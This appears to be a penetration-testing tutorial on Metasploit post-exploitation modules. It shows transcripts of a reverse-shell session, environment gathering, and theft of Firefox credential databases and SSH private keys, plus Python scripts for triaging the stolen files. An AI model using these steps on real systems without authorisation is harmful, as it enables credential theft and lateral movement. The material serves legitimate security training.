env
The env module collects and displays the operating system environment variables of the compromised system. Besides basic platform details (OS, processor architecture, temp directories), the Path variable in particular often reveals software that is useful later in the engagement; in the output below it shows Perl, Python and SQL Server tool directories on the target.
meterpreter > run post/multi/gather/env
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 37 Stepping 2, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=2502
Path=C:\Perl\site\bin;C:\Perl\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;c:\python25;c:\Program Files\Microsoft SQL Server\90\Tools\$
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
windir=C:\WINDOWS
meterpreter >
firefox_creds
The firefox_creds post-exploitation module gathers the saved-credential and cookie databases from an installed instance of Firefox on the compromised host: cookies.sqlite, key3.db (the NSS key database) and signons.sqlite (the encrypted logins). The module only downloads the files; third-party tools are then used offline to decrypt the passwords, which works without further effort only if no master password is set on the database.
meterpreter > run post/multi/gather/firefox_creds

[*] Checking for Firefox directory in: C:\Documents and Settings\Administrator\Application Data\Mozilla\
[*] Found Firefox installed
[*] Locating Firefox Profiles...
[+] Found Profile 8r4i3uac.default
[+] Downloading cookies.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading cookies.sqlite-journal file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading key3.db file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading signons.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
meterpreter >
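What the downloaded files contain, and why the master password matters, is easier to see with them open offline. The following Python script is an added example, not part of the Metasploit module or of this page. It builds a constructed cookies.sqlite and signons.sqlite pair with the Firefox 3.x table layout (moz_cookies / moz_logins), lists the cookies with their expiry and Secure/HttpOnly flags, and decodes the ASN.1 wrapper that NSS puts around each encrypted login field, which tells a decryption tool which key in key3.db (by key id) and which cipher (3DES-CBC) it needs. All hostnames, cookie values and key material are made up; nothing is decrypted, because that requires key3.db and, if one is set, the master password.

```python
# Added example for triaging firefox_creds loot; all sample data below is constructed.
import base64
import os
import sqlite3
import tempfile

DES_EDE3_CBC = bytes.fromhex("2a864886f70d0307")  # OID 1.2.840.113549.3.7 (des-ede3-cbc)

def der_tlv(tag, value):
    """Encode one DER element; short-form length is enough for these small blobs."""
    if len(value) >= 0x80:
        raise ValueError("short-form lengths only")
    return bytes([tag, len(value)]) + value

def der_read(buf, pos):
    """Decode one DER element at pos -> (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    if length & 0x80:  # long form: the next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        pos += n
    start = pos + 2
    return tag, buf[start:start + length], start + length

def parse_login_blob(b64):
    """encryptedUsername/encryptedPassword are base64 of
    SEQUENCE { OCTET STRING keyId, SEQUENCE { OID cipher, OCTET STRING iv }, OCTET STRING ct }."""
    raw = base64.b64decode(b64)
    tag, seq, _ = der_read(raw, 0)
    if tag != 0x30:
        raise ValueError("not an NSS SDR blob")
    _, key_id, p = der_read(seq, 0)
    _, alg, p = der_read(seq, p)
    _, ct, _ = der_read(seq, p)
    _, oid, q = der_read(alg, 0)
    _, iv, _ = der_read(alg, q)
    return {"key_id": key_id.hex(),  # selects the 3DES key stored in key3.db
            "cipher": "des-ede3-cbc" if oid == DES_EDE3_CBC else oid.hex(),
            "iv": iv.hex(), "ciphertext_len": len(ct)}

def sample_blob(key_id, iv, ct):
    """Build a blob with the same layout (constructed data, not real loot)."""
    alg = der_tlv(0x30, der_tlv(0x06, DES_EDE3_CBC) + der_tlv(0x04, iv))
    return base64.b64encode(der_tlv(0x30, der_tlv(0x04, key_id) + alg + der_tlv(0x04, ct))).decode()

def build_sample_profile(profile_dir):
    """Write constructed cookies.sqlite and signons.sqlite into profile_dir."""
    db = sqlite3.connect(os.path.join(profile_dir, "cookies.sqlite"))
    db.execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, name TEXT, value TEXT, "
               "host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, "
               "isSecure INTEGER, isHttpOnly INTEGER)")
    db.executemany("INSERT INTO moz_cookies VALUES (NULL,?,?,?,?,?,?,?,?)", [
        ("PHPSESSID", "c0ffee", "intranet.example.com", "/", 1300000000, 0, 0, 0),
        ("auth", "abc123", ".example.com", "/", 4102444800, 0, 1, 1)])
    db.commit()
    db.close()
    db = sqlite3.connect(os.path.join(profile_dir, "signons.sqlite"))
    db.execute("CREATE TABLE moz_logins (id INTEGER PRIMARY KEY, hostname TEXT, httpRealm TEXT, "
               "formSubmitURL TEXT, usernameField TEXT, passwordField TEXT, encryptedUsername TEXT, "
               "encryptedPassword TEXT, guid TEXT, encType INTEGER)")
    db.execute("INSERT INTO moz_logins VALUES (NULL,?,?,?,?,?,?,?,?,?)", (
        "https://intranet.example.com", None, "https://intranet.example.com", "user", "pass",
        sample_blob(b"\x11" * 16, b"\x22" * 8, b"\x33" * 16),
        sample_blob(b"\x11" * 16, b"\x44" * 8, b"\x55" * 24),
        "{00000000-0000-0000-0000-000000000000}", 1))  # encType 1 = NSS SDR, 0 = legacy base64
    db.commit()
    db.close()
    return profile_dir

def triage(profile_dir, now):
    """Summarize cookies (reusable until expiry) and logins (decryptable with key3.db)."""
    report = {"cookies": [], "logins": []}
    db = sqlite3.connect(os.path.join(profile_dir, "cookies.sqlite"))
    for name, host, expiry, secure, httponly in db.execute(
            "SELECT name, host, expiry, isSecure, isHttpOnly FROM moz_cookies ORDER BY id"):
        report["cookies"].append({"host": host, "name": name, "expired": expiry < now,
                                  "secure": bool(secure), "httponly": bool(httponly)})
    db.close()
    db = sqlite3.connect(os.path.join(profile_dir, "signons.sqlite"))
    for hostname, user, pw, enc_type in db.execute(
            "SELECT hostname, encryptedUsername, encryptedPassword, encType FROM moz_logins ORDER BY id"):
        entry = {"hostname": hostname, "nss_encrypted": enc_type == 1}
        if enc_type == 1:
            entry["username_blob"], entry["password_blob"] = parse_login_blob(user), parse_login_blob(pw)
        else:  # encType 0: the field is just base64 plaintext
            entry["username"], entry["password"] = base64.b64decode(user).decode(), base64.b64decode(pw).decode()
        report["logins"].append(entry)
    db.close()
    return report

def demo(now=1400000000):
    """Build the sample profile in a temp dir and triage it (now is a fixed Unix time here)."""
    return triage(build_sample_profile(tempfile.mkdtemp()), now)
```

With real loot, call triage() on the directory holding the downloaded cookies.sqlite and signons.sqlite with now=time.time(). The key_id in each blob names the entry in key3.db that the decryption tool must unwrap; with no master password that unwrapping uses an empty password, which is why the module's output is immediately useful in that case.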
ssh_creds
The ssh_creds module collects the contents of every user's .ssh directory on the targeted machine: private and public keys, along with known_hosts, authorized_keys and any other files found there, are downloaded. The module works against a plain command-shell session as well as Meterpreter; the example below runs it against a Linux shell session obtained with linux/x86/shell_reverse_tcp.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.101
lhost => 192.168.1.101
msf exploit(handler) > set LPORT 443
lport => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.101:443
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.101:37059) at 2011-06-02 11:06:02 -0600

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf exploit(handler) > use post/multi/gather/ssh_creds
msf post(ssh_creds) > show options

Module options (post/multi/gather/ssh_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(ssh_creds) > set SESSION 1
session => 1
msf post(ssh_creds) > run

[*] Determining session platform and type...
[*] Checking for OpenSSH profile in: /bin/.ssh
[-] OpenSSH profile not found in /bin/.ssh
[*] Checking for OpenSSH profile in: /dev/.ssh
...snip...
[-] OpenSSH profile not found in /var/www/.ssh
[+] Downloading /root/.ssh/authorized_keys
[+] Downloading /root/.ssh/authorized_keys2
[+] Downloading /root/.ssh/id_rsa
[+] Downloading /root/.ssh/id_rsa.pub
[+] Downloading /root/.ssh/known_hosts
[+] Downloading /usr/NX/home/nx/.ssh/authorized_keys2
[+] Downloading /usr/NX/home/nx/.ssh/default.id_dsa.pub
[+] Downloading /usr/NX/home/nx/.ssh/known_hosts
[+] Downloading /usr/NX/home/nx/.ssh/restore.id_dsa.pub
[*] Post module execution completed
msf post(ssh_creds) >
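Once the files are on the attacker's machine, the practical questions are which private keys are usable without a passphrase, what the authorized_keys options allow a key to do, and which hosts appear in known_hosts (hashed entries cannot be reversed, only tested against guessed names). The following Python script is an added example, not part of the Metasploit module or of this page, that answers those questions over constructed sample files: the hostnames, key comments and key placeholders are invented, the hashed known_hosts entry is generated by the script itself, the PEM key sample carries only its headers, and the OpenSSH-format key sample contains only the header fields rather than real key material.

```python
# Added example for triaging ssh_creds loot; all sample inputs below are constructed.
import base64
import hashlib
import hmac
import re
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def private_key_status(key_text):
    """Which on-disk format the private key uses and whether it needs a passphrase."""
    lines = key_text.strip().splitlines()
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(lines[1:-1]))
        if not raw.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        pos, fields = len(b"openssh-key-v1\x00"), []
        for _ in range(2):  # ciphername, kdfname: SSH strings (4-byte big-endian length + bytes)
            (n,) = struct.unpack(">I", raw[pos:pos + 4])
            fields.append(raw[pos + 4:pos + 4 + n].decode())
            pos += 4 + n
        return {"format": "openssh-key-v1", "cipher": fields[0], "kdf": fields[1],
                "encrypted": fields[0] != "none"}
    # Legacy PEM ("BEGIN RSA PRIVATE KEY"), the format 2011-era OpenSSH wrote for id_rsa
    dek = re.search(r"^DEK-Info: ([^,\s]+)", key_text, re.M)
    return {"format": "pem", "cipher": dek.group(1) if dek else "none",
            "encrypted": bool(re.search(r"^Proc-Type: 4,ENCRYPTED$", key_text, re.M))}

def sample_openssh_key(cipher=b"none", kdf=b"none"):
    """Header fields only of an openssh-key-v1 blob (constructed, truncated, no key material)."""
    raw = (b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher
           + struct.pack(">I", len(kdf)) + kdf)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n"
            % base64.b64encode(raw).decode())

def parse_authorized_keys(text):
    """One dict per key: the options prefix decides how useful the key is for a pivot."""
    entries = []
    for line in text.splitlines():
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if not tokens or tokens[0].startswith("#") or idx is None:
            continue
        options = " ".join(tokens[:idx])  # quoted options with spaces are rejoined approximately
        entries.append({"options": options, "type": tokens[idx], "comment": " ".join(tokens[idx + 2:]),
                        "forced_command": "command=" in options, "from_restricted": "from=" in options})
    return entries

def hashed_host_entry(host, salt):
    """The '|1|salt|hmac' host field ssh writes with HashKnownHosts yes (HMAC-SHA1, key = salt)."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())

def match_hashed_host(field, candidate):
    """Hashed entries cannot be reversed, only tested against a guessed hostname."""
    _, ver, salt_b64, mac_b64 = field.split("|")
    mac = hmac.new(base64.b64decode(salt_b64), candidate.encode(), hashlib.sha1).digest()
    return ver == "1" and hmac.compare_digest(mac, base64.b64decode(mac_b64))

def parse_known_hosts(text, candidates=()):
    """One dict per entry; hashed host fields are resolved against the candidate list."""
    entries = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        marker = tokens.pop(0) if tokens[0].startswith("@") else None  # @cert-authority / @revoked
        hostfield, key_type = tokens[0], tokens[1]
        hashed = hostfield.startswith("|1|")
        hosts = [c for c in candidates if match_hashed_host(hostfield, c)] if hashed else hostfield.split(",")
        entries.append({"hashed": hashed, "hosts": hosts, "type": key_type, "marker": marker})
    return entries

SAMPLE_ID_RSA = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                 "(key material omitted: constructed sample)\n-----END RSA PRIVATE KEY-----\n")
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER root@backup\n"
    'command="/usr/bin/rsync --server",no-pty,from="192.168.1.0/24" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER backup@nas\n')

def sample_known_hosts():
    salt = bytes(range(20))  # constructed; ssh uses a random salt per entry
    return "\n".join(["192.168.1.50,fileserver ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER",
                      "[10.0.0.7]:2222 ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER",
                      hashed_host_entry("db01.internal", salt) + " ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER"])

def demo():
    """Triage the constructed loot; candidates for hashed hosts come from other recon."""
    return {"id_rsa": private_key_status(SAMPLE_ID_RSA),
            "id_ed25519": private_key_status(sample_openssh_key()),
            "authorized_keys": parse_authorized_keys(SAMPLE_AUTHORIZED_KEYS),
            "known_hosts": parse_known_hosts(sample_known_hosts(), ["db01.internal", "web01.internal"])}
```

An unencrypted id_rsa plus a plaintext known_hosts list is a ready-made pivot path; an encrypted key needs the passphrase cracked first, and a key whose authorized_keys entry carries command= or from= restrictions is only usable within those limits. Candidate names for hashed known_hosts entries come from other files in the loot, DNS, or internal name lists gathered elsewhere on the engagement.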